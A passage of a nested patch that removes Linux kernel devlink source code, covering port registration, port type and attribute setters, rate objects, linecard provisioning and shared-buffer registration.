+-	WARN_ON(!list_empty(&devlink->resource_list));
+-	WARN_ON(!list_empty(&devlink->dpipe_table_list));
+-	WARN_ON(!list_empty(&devlink->sb_list));
+-	WARN_ON(!list_empty(&devlink->rate_list));
+-	WARN_ON(!list_empty(&devlink->linecard_list));
+-	WARN_ON(!list_empty(&devlink->port_list));
+-
+-	xa_destroy(&devlink->snapshot_ids);
+-	xa_erase(&devlinks, devlink->index);
+-
+-	kfree(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_free);
+-
+-static void devlink_port_type_warn(struct work_struct *work)
+-{
+-	struct devlink_port *port = container_of(to_delayed_work(work),
+-						 struct devlink_port,
+-						 type_warn_dw);
+-	dev_warn(port->devlink->dev, "Type was not set for devlink port.");
+-}
+-
+-static bool devlink_port_type_should_warn(struct devlink_port *devlink_port)
+-{
+-	/* Ignore CPU and DSA flavours. */
+-	return devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_CPU &&
+-	       devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_DSA &&
+-	       devlink_port->attrs.flavour != DEVLINK_PORT_FLAVOUR_UNUSED;
+-}
+-
+-#define DEVLINK_PORT_TYPE_WARN_TIMEOUT (HZ * 3600)
+-
+-static void devlink_port_type_warn_schedule(struct devlink_port *devlink_port)
+-{
+-	if (!devlink_port_type_should_warn(devlink_port))
+-		return;
+-	/* Schedule a work to WARN in case driver does not set port
+-	 * type within timeout.
+-	 */
+-	schedule_delayed_work(&devlink_port->type_warn_dw,
+-			      DEVLINK_PORT_TYPE_WARN_TIMEOUT);
+-}
+-
+-static void devlink_port_type_warn_cancel(struct devlink_port *devlink_port)
+-{
+-	if (!devlink_port_type_should_warn(devlink_port))
+-		return;
+-	cancel_delayed_work_sync(&devlink_port->type_warn_dw);
+-}
+-
+-/**
+- * devlink_port_init() - Init devlink port
+- *
+- * @devlink: devlink
+- * @devlink_port: devlink port
+- *
+- * Initialize essencial stuff that is needed for functions
+- * that may be called before devlink port registration.
+- * Call to this function is optional and not needed
+- * in case the driver does not use such functions.
+- */
+-void devlink_port_init(struct devlink *devlink,
+-		       struct devlink_port *devlink_port)
+-{
+-	if (devlink_port->initialized)
+-		return;
+-	devlink_port->devlink = devlink;
+-	INIT_LIST_HEAD(&devlink_port->region_list);
+-	devlink_port->initialized = true;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_init);
+-
+-/**
+- * devlink_port_fini() - Deinitialize devlink port
+- *
+- * @devlink_port: devlink port
+- *
+- * Deinitialize essencial stuff that is in use for functions
+- * that may be called after devlink port unregistration.
+- * Call to this function is optional and not needed
+- * in case the driver does not use such functions.
+- */
+-void devlink_port_fini(struct devlink_port *devlink_port)
+-{
+-	WARN_ON(!list_empty(&devlink_port->region_list));
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_fini);
+-
+-/**
+- * devl_port_register() - Register devlink port
+- *
+- * @devlink: devlink
+- * @devlink_port: devlink port
+- * @port_index: driver-specific numerical identifier of the port
+- *
+- * Register devlink port with provided port index. User can use
+- * any indexing, even hw-related one. devlink_port structure
+- * is convenient to be embedded inside user driver private structure.
+- * Note that the caller should take care of zeroing the devlink_port
+- * structure.
+- */
+-int devl_port_register(struct devlink *devlink,
+-		       struct devlink_port *devlink_port,
+-		       unsigned int port_index)
+-{
+-	devl_assert_locked(devlink);
+-
+-	if (devlink_port_index_exists(devlink, port_index))
+-		return -EEXIST;
+-
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	devlink_port_init(devlink, devlink_port);
+-	devlink_port->registered = true;
+-	devlink_port->index = port_index;
+-	spin_lock_init(&devlink_port->type_lock);
+-	INIT_LIST_HEAD(&devlink_port->reporter_list);
+-	mutex_init(&devlink_port->reporters_lock);
+-	list_add_tail(&devlink_port->list, &devlink->port_list);
+-
+-	INIT_DELAYED_WORK(&devlink_port->type_warn_dw, &devlink_port_type_warn);
+-	devlink_port_type_warn_schedule(devlink_port);
+-	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_port_register);
+-
+-/**
+- *	devlink_port_register - Register devlink port
+- *
+- *	@devlink: devlink
+- *	@devlink_port: devlink port
+- *	@port_index: driver-specific numerical identifier of the port
+- *
+- *	Register devlink port with provided port index. User can use
+- *	any indexing, even hw-related one. devlink_port structure
+- *	is convenient to be embedded inside user driver private structure.
+- *	Note that the caller should take care of zeroing the devlink_port
+- *	structure.
+- *
+- *	Context: Takes and release devlink->lock <mutex>.
+- */
+-int devlink_port_register(struct devlink *devlink,
+-			  struct devlink_port *devlink_port,
+-			  unsigned int port_index)
+-{
+-	int err;
+-
+-	devl_lock(devlink);
+-	err = devl_port_register(devlink, devlink_port, port_index);
+-	devl_unlock(devlink);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_register);
+-
+-/**
+- * devl_port_unregister() - Unregister devlink port
+- *
+- * @devlink_port: devlink port
+- */
+-void devl_port_unregister(struct devlink_port *devlink_port)
+-{
+-	lockdep_assert_held(&devlink_port->devlink->lock);
+-
+-	devlink_port_type_warn_cancel(devlink_port);
+-	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_DEL);
+-	list_del(&devlink_port->list);
+-	WARN_ON(!list_empty(&devlink_port->reporter_list));
+-	mutex_destroy(&devlink_port->reporters_lock);
+-	devlink_port->registered = false;
+-}
+-EXPORT_SYMBOL_GPL(devl_port_unregister);
+-
+-/**
+- *	devlink_port_unregister - Unregister devlink port
+- *
+- *	@devlink_port: devlink port
+- *
+- *	Context: Takes and release devlink->lock <mutex>.
+- */
+-void devlink_port_unregister(struct devlink_port *devlink_port)
+-{
+-	struct devlink *devlink = devlink_port->devlink;
+-
+-	devl_lock(devlink);
+-	devl_port_unregister(devlink_port);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_unregister);
+-
+-static void __devlink_port_type_set(struct devlink_port *devlink_port,
+-				    enum devlink_port_type type,
+-				    void *type_dev)
+-{
+-	ASSERT_DEVLINK_PORT_REGISTERED(devlink_port);
+-
+-	devlink_port_type_warn_cancel(devlink_port);
+-	spin_lock_bh(&devlink_port->type_lock);
+-	devlink_port->type = type;
+-	devlink_port->type_dev = type_dev;
+-	spin_unlock_bh(&devlink_port->type_lock);
+-	devlink_port_notify(devlink_port, DEVLINK_CMD_PORT_NEW);
+-}
+-
+-static void devlink_port_type_netdev_checks(struct devlink_port *devlink_port,
+-					    struct net_device *netdev)
+-{
+-	const struct net_device_ops *ops = netdev->netdev_ops;
+-
+-	/* If driver registers devlink port, it should set devlink port
+-	 * attributes accordingly so the compat functions are called
+-	 * and the original ops are not used.
+-	 */
+-	if (ops->ndo_get_phys_port_name) {
+-		/* Some drivers use the same set of ndos for netdevs
+-		 * that have devlink_port registered and also for
+-		 * those who don't. Make sure that ndo_get_phys_port_name
+-		 * returns -EOPNOTSUPP here in case it is defined.
+-		 * Warn if not.
+-		 */
+-		char name[IFNAMSIZ];
+-		int err;
+-
+-		err = ops->ndo_get_phys_port_name(netdev, name, sizeof(name));
+-		WARN_ON(err != -EOPNOTSUPP);
+-	}
+-	if (ops->ndo_get_port_parent_id) {
+-		/* Some drivers use the same set of ndos for netdevs
+-		 * that have devlink_port registered and also for
+-		 * those who don't. Make sure that ndo_get_port_parent_id
+-		 * returns -EOPNOTSUPP here in case it is defined.
+-		 * Warn if not.
+-		 */
+-		struct netdev_phys_item_id ppid;
+-		int err;
+-
+-		err = ops->ndo_get_port_parent_id(netdev, &ppid);
+-		WARN_ON(err != -EOPNOTSUPP);
+-	}
+-}
+-
+-/**
+- *	devlink_port_type_eth_set - Set port type to Ethernet
+- *
+- *	@devlink_port: devlink port
+- *	@netdev: related netdevice
+- */
+-void devlink_port_type_eth_set(struct devlink_port *devlink_port,
+-			       struct net_device *netdev)
+-{
+-	if (netdev)
+-		devlink_port_type_netdev_checks(devlink_port, netdev);
+-	else
+-		dev_warn(devlink_port->devlink->dev,
+-			 "devlink port type for port %d set to Ethernet without a software interface reference, device type not supported by the kernel?\n",
+-			 devlink_port->index);
+-
+-	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_ETH, netdev);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_type_eth_set);
+-
+-/**
+- *	devlink_port_type_ib_set - Set port type to InfiniBand
+- *
+- *	@devlink_port: devlink port
+- *	@ibdev: related IB device
+- */
+-void devlink_port_type_ib_set(struct devlink_port *devlink_port,
+-			      struct ib_device *ibdev)
+-{
+-	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_IB, ibdev);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_type_ib_set);
+-
+-/**
+- *	devlink_port_type_clear - Clear port type
+- *
+- *	@devlink_port: devlink port
+- */
+-void devlink_port_type_clear(struct devlink_port *devlink_port)
+-{
+-	__devlink_port_type_set(devlink_port, DEVLINK_PORT_TYPE_NOTSET, NULL);
+-	devlink_port_type_warn_schedule(devlink_port);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_type_clear);
+-
+-static int __devlink_port_attrs_set(struct devlink_port *devlink_port,
+-				    enum devlink_port_flavour flavour)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-
+-	devlink_port->attrs_set = true;
+-	attrs->flavour = flavour;
+-	if (attrs->switch_id.id_len) {
+-		devlink_port->switch_port = true;
+-		if (WARN_ON(attrs->switch_id.id_len > MAX_PHYS_ITEM_ID_LEN))
+-			attrs->switch_id.id_len = MAX_PHYS_ITEM_ID_LEN;
+-	} else {
+-		devlink_port->switch_port = false;
+-	}
+-	return 0;
+-}
+-
+-/**
+- *	devlink_port_attrs_set - Set port attributes
+- *
+- *	@devlink_port: devlink port
+- *	@attrs: devlink port attrs
+- */
+-void devlink_port_attrs_set(struct devlink_port *devlink_port,
+-			    struct devlink_port_attrs *attrs)
+-{
+-	int ret;
+-
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	devlink_port->attrs = *attrs;
+-	ret = __devlink_port_attrs_set(devlink_port, attrs->flavour);
+-	if (ret)
+-		return;
+-	WARN_ON(attrs->splittable && attrs->split);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_attrs_set);
+-
+-/**
+- *	devlink_port_attrs_pci_pf_set - Set PCI PF port attributes
+- *
+- *	@devlink_port: devlink port
+- *	@controller: associated controller number for the devlink port instance
+- *	@pf: associated PF for the devlink port instance
+- *	@external: indicates if the port is for an external controller
+- */
+-void devlink_port_attrs_pci_pf_set(struct devlink_port *devlink_port, u32 controller,
+-				   u16 pf, bool external)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-	int ret;
+-
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	ret = __devlink_port_attrs_set(devlink_port,
+-				       DEVLINK_PORT_FLAVOUR_PCI_PF);
+-	if (ret)
+-		return;
+-	attrs->pci_pf.controller = controller;
+-	attrs->pci_pf.pf = pf;
+-	attrs->pci_pf.external = external;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_pf_set);
+-
+-/**
+- *	devlink_port_attrs_pci_vf_set - Set PCI VF port attributes
+- *
+- *	@devlink_port: devlink port
+- *	@controller: associated controller number for the devlink port instance
+- *	@pf: associated PF for the devlink port instance
+- *	@vf: associated VF of a PF for the devlink port instance
+- *	@external: indicates if the port is for an external controller
+- */
+-void devlink_port_attrs_pci_vf_set(struct devlink_port *devlink_port, u32 controller,
+-				   u16 pf, u16 vf, bool external)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-	int ret;
+-
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	ret = __devlink_port_attrs_set(devlink_port,
+-				       DEVLINK_PORT_FLAVOUR_PCI_VF);
+-	if (ret)
+-		return;
+-	attrs->pci_vf.controller = controller;
+-	attrs->pci_vf.pf = pf;
+-	attrs->pci_vf.vf = vf;
+-	attrs->pci_vf.external = external;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_vf_set);
+-
+-/**
+- *	devlink_port_attrs_pci_sf_set - Set PCI SF port attributes
+- *
+- *	@devlink_port: devlink port
+- *	@controller: associated controller number for the devlink port instance
+- *	@pf: associated PF for the devlink port instance
+- *	@sf: associated SF of a PF for the devlink port instance
+- *	@external: indicates if the port is for an external controller
+- */
+-void devlink_port_attrs_pci_sf_set(struct devlink_port *devlink_port, u32 controller,
+-				   u16 pf, u32 sf, bool external)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-	int ret;
+-
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	ret = __devlink_port_attrs_set(devlink_port,
+-				       DEVLINK_PORT_FLAVOUR_PCI_SF);
+-	if (ret)
+-		return;
+-	attrs->pci_sf.controller = controller;
+-	attrs->pci_sf.pf = pf;
+-	attrs->pci_sf.sf = sf;
+-	attrs->pci_sf.external = external;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_attrs_pci_sf_set);
+-
+-/**
+- * devl_rate_leaf_create - create devlink rate leaf
+- * @devlink_port: devlink port object to create rate object on
+- * @priv: driver private data
+- *
+- * Create devlink rate object of type leaf on provided @devlink_port.
+- */
+-int devl_rate_leaf_create(struct devlink_port *devlink_port, void *priv)
+-{
+-	struct devlink *devlink = devlink_port->devlink;
+-	struct devlink_rate *devlink_rate;
+-
+-	devl_assert_locked(devlink_port->devlink);
+-
+-	if (WARN_ON(devlink_port->devlink_rate))
+-		return -EBUSY;
+-
+-	devlink_rate = kzalloc(sizeof(*devlink_rate), GFP_KERNEL);
+-	if (!devlink_rate)
+-		return -ENOMEM;
+-
+-	devlink_rate->type = DEVLINK_RATE_TYPE_LEAF;
+-	devlink_rate->devlink = devlink;
+-	devlink_rate->devlink_port = devlink_port;
+-	devlink_rate->priv = priv;
+-	list_add_tail(&devlink_rate->list, &devlink->rate_list);
+-	devlink_port->devlink_rate = devlink_rate;
+-	devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_NEW);
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_rate_leaf_create);
+-
+-/**
+- * devl_rate_leaf_destroy - destroy devlink rate leaf
+- *
+- * @devlink_port: devlink port linked to the rate object
+- *
+- * Destroy the devlink rate object of type leaf on provided @devlink_port.
+- */
+-void devl_rate_leaf_destroy(struct devlink_port *devlink_port)
+-{
+-	struct devlink_rate *devlink_rate = devlink_port->devlink_rate;
+-
+-	devl_assert_locked(devlink_port->devlink);
+-	if (!devlink_rate)
+-		return;
+-
+-	devlink_rate_notify(devlink_rate, DEVLINK_CMD_RATE_DEL);
+-	if (devlink_rate->parent)
+-		refcount_dec(&devlink_rate->parent->refcnt);
+-	list_del(&devlink_rate->list);
+-	devlink_port->devlink_rate = NULL;
+-	kfree(devlink_rate);
+-}
+-EXPORT_SYMBOL_GPL(devl_rate_leaf_destroy);
+-
+-/**
+- * devl_rate_nodes_destroy - destroy all devlink rate nodes on device
+- * @devlink: devlink instance
+- *
+- * Unset parent for all rate objects and destroy all rate nodes
+- * on specified device.
+- */
+-void devl_rate_nodes_destroy(struct devlink *devlink)
+-{
+-	static struct devlink_rate *devlink_rate, *tmp;
+-	const struct devlink_ops *ops = devlink->ops;
+-
+-	devl_assert_locked(devlink);
+-
+-	list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
+-		if (!devlink_rate->parent)
+-			continue;
+-
+-		refcount_dec(&devlink_rate->parent->refcnt);
+-		if (devlink_rate_is_leaf(devlink_rate))
+-			ops->rate_leaf_parent_set(devlink_rate, NULL, devlink_rate->priv,
+-						  NULL, NULL);
+-		else if (devlink_rate_is_node(devlink_rate))
+-			ops->rate_node_parent_set(devlink_rate, NULL, devlink_rate->priv,
+-						  NULL, NULL);
+-	}
+-	list_for_each_entry_safe(devlink_rate, tmp, &devlink->rate_list, list) {
+-		if (devlink_rate_is_node(devlink_rate)) {
+-			ops->rate_node_del(devlink_rate, devlink_rate->priv, NULL);
+-			list_del(&devlink_rate->list);
+-			kfree(devlink_rate->name);
+-			kfree(devlink_rate);
+-		}
+-	}
+-}
+-EXPORT_SYMBOL_GPL(devl_rate_nodes_destroy);
+-
+-/**
+- *	devlink_port_linecard_set - Link port with a linecard
+- *
+- *	@devlink_port: devlink port
+- *	@linecard: devlink linecard
+- */
+-void devlink_port_linecard_set(struct devlink_port *devlink_port,
+-			       struct devlink_linecard *linecard)
+-{
+-	ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port);
+-
+-	devlink_port->linecard = linecard;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_linecard_set);
+-
+-static int __devlink_port_phys_port_name_get(struct devlink_port *devlink_port,
+-					     char *name, size_t len)
+-{
+-	struct devlink_port_attrs *attrs = &devlink_port->attrs;
+-	int n = 0;
+-
+-	if (!devlink_port->attrs_set)
+-		return -EOPNOTSUPP;
+-
+-	switch (attrs->flavour) {
+-	case DEVLINK_PORT_FLAVOUR_PHYSICAL:
+-		if (devlink_port->linecard)
+-			n = snprintf(name, len, "l%u",
+-				     devlink_port->linecard->index);
+-		if (n < len)
+-			n += snprintf(name + n, len - n, "p%u",
+-				      attrs->phys.port_number);
+-		if (n < len && attrs->split)
+-			n += snprintf(name + n, len - n, "s%u",
+-				      attrs->phys.split_subport_number);
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_CPU:
+-	case DEVLINK_PORT_FLAVOUR_DSA:
+-	case DEVLINK_PORT_FLAVOUR_UNUSED:
+-		/* As CPU and DSA ports do not have a netdevice associated
+-		 * case should not ever happen.
+-		 */
+-		WARN_ON(1);
+-		return -EINVAL;
+-	case DEVLINK_PORT_FLAVOUR_PCI_PF:
+-		if (attrs->pci_pf.external) {
+-			n = snprintf(name, len, "c%u", attrs->pci_pf.controller);
+-			if (n >= len)
+-				return -EINVAL;
+-			len -= n;
+-			name += n;
+-		}
+-		n = snprintf(name, len, "pf%u", attrs->pci_pf.pf);
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_PCI_VF:
+-		if (attrs->pci_vf.external) {
+-			n = snprintf(name, len, "c%u", attrs->pci_vf.controller);
+-			if (n >= len)
+-				return -EINVAL;
+-			len -= n;
+-			name += n;
+-		}
+-		n = snprintf(name, len, "pf%uvf%u",
+-			     attrs->pci_vf.pf, attrs->pci_vf.vf);
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_PCI_SF:
+-		if (attrs->pci_sf.external) {
+-			n = snprintf(name, len, "c%u", attrs->pci_sf.controller);
+-			if (n >= len)
+-				return -EINVAL;
+-			len -= n;
+-			name += n;
+-		}
+-		n = snprintf(name, len, "pf%usf%u", attrs->pci_sf.pf,
+-			     attrs->pci_sf.sf);
+-		break;
+-	case DEVLINK_PORT_FLAVOUR_VIRTUAL:
+-		return -EOPNOTSUPP;
+-	}
+-
+-	if (n >= len)
+-		return -EINVAL;
+-
+-	return 0;
+-}
+-
+-static int devlink_linecard_types_init(struct devlink_linecard *linecard)
+-{
+-	struct devlink_linecard_type *linecard_type;
+-	unsigned int count;
+-	int i;
+-
+-	count = linecard->ops->types_count(linecard, linecard->priv);
+-	linecard->types = kmalloc_array(count, sizeof(*linecard_type),
+-					GFP_KERNEL);
+-	if (!linecard->types)
+-		return -ENOMEM;
+-	linecard->types_count = count;
+-
+-	for (i = 0; i < count; i++) {
+-		linecard_type = &linecard->types[i];
+-		linecard->ops->types_get(linecard, linecard->priv, i,
+-					 &linecard_type->type,
+-					 &linecard_type->priv);
+-	}
+-	return 0;
+-}
+-
+-static void devlink_linecard_types_fini(struct devlink_linecard *linecard)
+-{
+-	kfree(linecard->types);
+-}
+-
+-/**
+- *	devlink_linecard_create - Create devlink linecard
+- *
+- *	@devlink: devlink
+- *	@linecard_index: driver-specific numerical identifier of the linecard
+- *	@ops: linecards ops
+- *	@priv: user priv pointer
+- *
+- *	Create devlink linecard instance with provided linecard index.
+- *	Caller can use any indexing, even hw-related one.
+- *
+- *	Return: Line card structure or an ERR_PTR() encoded error code.
+- */
+-struct devlink_linecard *
+-devlink_linecard_create(struct devlink *devlink, unsigned int linecard_index,
+-			const struct devlink_linecard_ops *ops, void *priv)
+-{
+-	struct devlink_linecard *linecard;
+-	int err;
+-
+-	if (WARN_ON(!ops || !ops->provision || !ops->unprovision ||
+-		    !ops->types_count || !ops->types_get))
+-		return ERR_PTR(-EINVAL);
+-
+-	mutex_lock(&devlink->linecards_lock);
+-	if (devlink_linecard_index_exists(devlink, linecard_index)) {
+-		mutex_unlock(&devlink->linecards_lock);
+-		return ERR_PTR(-EEXIST);
+-	}
+-
+-	linecard = kzalloc(sizeof(*linecard), GFP_KERNEL);
+-	if (!linecard) {
+-		mutex_unlock(&devlink->linecards_lock);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	linecard->devlink = devlink;
+-	linecard->index = linecard_index;
+-	linecard->ops = ops;
+-	linecard->priv = priv;
+-	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
+-	mutex_init(&linecard->state_lock);
+-
+-	err = devlink_linecard_types_init(linecard);
+-	if (err) {
+-		mutex_destroy(&linecard->state_lock);
+-		kfree(linecard);
+-		mutex_unlock(&devlink->linecards_lock);
+-		return ERR_PTR(err);
+-	}
+-
+-	list_add_tail(&linecard->list, &devlink->linecard_list);
+-	refcount_set(&linecard->refcount, 1);
+-	mutex_unlock(&devlink->linecards_lock);
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	return linecard;
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_create);
+-
+-/**
+- *	devlink_linecard_destroy - Destroy devlink linecard
+- *
+- *	@linecard: devlink linecard
+- */
+-void devlink_linecard_destroy(struct devlink_linecard *linecard)
+-{
+-	struct devlink *devlink = linecard->devlink;
+-
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_DEL);
+-	mutex_lock(&devlink->linecards_lock);
+-	list_del(&linecard->list);
+-	devlink_linecard_types_fini(linecard);
+-	mutex_unlock(&devlink->linecards_lock);
+-	devlink_linecard_put(linecard);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_destroy);
+-
+-/**
+- *	devlink_linecard_provision_set - Set provisioning on linecard
+- *
+- *	@linecard: devlink linecard
+- *	@type: linecard type
+- *
+- *	This is either called directly from the provision() op call or
+- *	as a result of the provision() op call asynchronously.
+- */
+-void devlink_linecard_provision_set(struct devlink_linecard *linecard,
+-				    const char *type)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	WARN_ON(linecard->type && strcmp(linecard->type, type));
+-	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONED;
+-	linecard->type = type;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_provision_set);
+-
+-/**
+- *	devlink_linecard_provision_clear - Clear provisioning on linecard
+- *
+- *	@linecard: devlink linecard
+- *
+- *	This is either called directly from the unprovision() op call or
+- *	as a result of the unprovision() op call asynchronously.
+- */
+-void devlink_linecard_provision_clear(struct devlink_linecard *linecard)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	WARN_ON(linecard->nested_devlink);
+-	linecard->state = DEVLINK_LINECARD_STATE_UNPROVISIONED;
+-	linecard->type = NULL;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_provision_clear);
+-
+-/**
+- *	devlink_linecard_provision_fail - Fail provisioning on linecard
+- *
+- *	@linecard: devlink linecard
+- *
+- *	This is either called directly from the provision() op call or
+- *	as a result of the provision() op call asynchronously.
+- */
+-void devlink_linecard_provision_fail(struct devlink_linecard *linecard)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	WARN_ON(linecard->nested_devlink);
+-	linecard->state = DEVLINK_LINECARD_STATE_PROVISIONING_FAILED;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_provision_fail);
+-
+-/**
+- *	devlink_linecard_activate - Set linecard active
+- *
+- *	@linecard: devlink linecard
+- */
+-void devlink_linecard_activate(struct devlink_linecard *linecard)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	WARN_ON(linecard->state != DEVLINK_LINECARD_STATE_PROVISIONED);
+-	linecard->state = DEVLINK_LINECARD_STATE_ACTIVE;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_activate);
+-
+-/**
+- *	devlink_linecard_deactivate - Set linecard inactive
+- *
+- *	@linecard: devlink linecard
+- */
+-void devlink_linecard_deactivate(struct devlink_linecard *linecard)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	switch (linecard->state) {
+-	case DEVLINK_LINECARD_STATE_ACTIVE:
+-		linecard->state = DEVLINK_LINECARD_STATE_PROVISIONED;
+-		devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-		break;
+-	case DEVLINK_LINECARD_STATE_UNPROVISIONING:
+-		/* Line card is being deactivated as part
+-		 * of unprovisioning flow.
+-		 */
+-		break;
+-	default:
+-		WARN_ON(1);
+-		break;
+-	}
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_deactivate);
+-
+-/**
+- *	devlink_linecard_nested_dl_set - Attach/detach nested devlink
+- *					 instance to linecard.
+- *
+- *	@linecard: devlink linecard
+- *	@nested_devlink: devlink instance to attach or NULL to detach
+- */
+-void devlink_linecard_nested_dl_set(struct devlink_linecard *linecard,
+-				    struct devlink *nested_devlink)
+-{
+-	mutex_lock(&linecard->state_lock);
+-	linecard->nested_devlink = nested_devlink;
+-	devlink_linecard_notify(linecard, DEVLINK_CMD_LINECARD_NEW);
+-	mutex_unlock(&linecard->state_lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_linecard_nested_dl_set);
+-
+-int devl_sb_register(struct devlink *devlink, unsigned int sb_index,
+-		     u32 size, u16 ingress_pools_count,
+-		     u16 egress_pools_count, u16 ingress_tc_count,
+-		     u16 egress_tc_count)
+-{
+-	struct devlink_sb *devlink_sb;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	if (devlink_sb_index_exists(devlink, sb_index))
+-		return -EEXIST;
+-
+-	devlink_sb = kzalloc(sizeof(*devlink_sb), GFP_KERNEL);
+-	if (!devlink_sb)
+-		return -ENOMEM;
+-	devlink_sb->index = sb_index;
+-	devlink_sb->size = size;
+-	devlink_sb->ingress_pools_count = ingress_pools_count;
+-	devlink_sb->egress_pools_count = egress_pools_count;
+-	devlink_sb->ingress_tc_count = ingress_tc_count;
+-	devlink_sb->egress_tc_count = egress_tc_count;
+-	list_add_tail(&devlink_sb->list, &devlink->sb_list);
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devl_sb_register);
+-
+-int devlink_sb_register(struct devlink *devlink, unsigned int sb_index,
+-			u32 size, u16 ingress_pools_count,
+-			u16 egress_pools_count, u16 ingress_tc_count,
+-			u16 egress_tc_count)
+-{
+-	int err;
+-
+-	devl_lock(devlink);
+-	err = devl_sb_register(devlink, sb_index, size, ingress_pools_count,
+-			       egress_pools_count, ingress_tc_count,
+-			       egress_tc_count);
+-	devl_unlock(devlink);
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_sb_register);
+-
+-void devl_sb_unregister(struct devlink *devlink, unsigned int sb_index)
+-{
+-	struct devlink_sb *devlink_sb;
+-
+-	lockdep_assert_held(&devlink->lock);
+-
+-	devlink_sb = devlink_sb_get_by_index(devlink, sb_index);
+-	WARN_ON(!devlink_sb);
+-	list_del(&devlink_sb->list);
+-	kfree(devlink_sb);
+-}
+-EXPORT_SYMBOL_GPL(devl_sb_unregister);
+-
+-void devlink_sb_unregister(struct devlink *devlink, unsigned int sb_index)
+-{
+-	devl_lock(devlink);
+-	devl_sb_unregister(devlink, sb_index);
+-	devl_unlock(devlink);
+-}
+-EXPORT_SYMBOL_GPL(devlink_sb_unregister);
+-
+-/**
+- * devl_dpipe_headers_register - register dpipe headers
+- *
+- * @devlink: devlink
+- * @dpipe_headers: dpipe header array
+- *
+- * Register the headers supported by hardware.
+- */
+-void devl_dpipe_headers_register(struct devlink *devlink,
+-				 struct devlink_dpipe_headers *dpipe_headers)
+-{
+-	lockdep_assert_held(&devlink->lock);
+-
+-	devlink->dpipe_headers = dpipe_headers;
+-}
+-EXPORT_SYMBOL_GPL(devl_dpipe_headers_register);
+-
+-/**
+- * devl_dpipe_headers_unregister - unregister dpipe headers
+- *
+- * @devlink: devlink
+- *
+- * Unregister the headers supported by hardware.
+- */
+-void devl_dpipe_headers_unregister(struct devlink *devlink)
+-{
+-	lockdep_assert_held(&devlink->lock);
+-
+-	devlink->dpipe_headers = NULL;
+-}
+-EXPORT_SYMBOL_GPL(devl_dpipe_headers_unregister);
+-
+-/**
+- *	devlink_dpipe_table_counter_enabled - check if counter allocation
+- *					      required
+- *	@devlink: devlink
+- *	@table_name: tables name
+- *
+- *	Used by driver to check if counter allocation is required.
+- *	After counter allocation is turned on the table entries
+- *	are updated to include counter statistics.
+- *
+- *	After that point on the driver must respect the counter
+- *	state so that each entry added to the table is added
+- *	with a counter.
+- */
+-bool devlink_dpipe_table_counter_enabled(struct devlink *devlink,
+-					 const char *table_name)
+-{
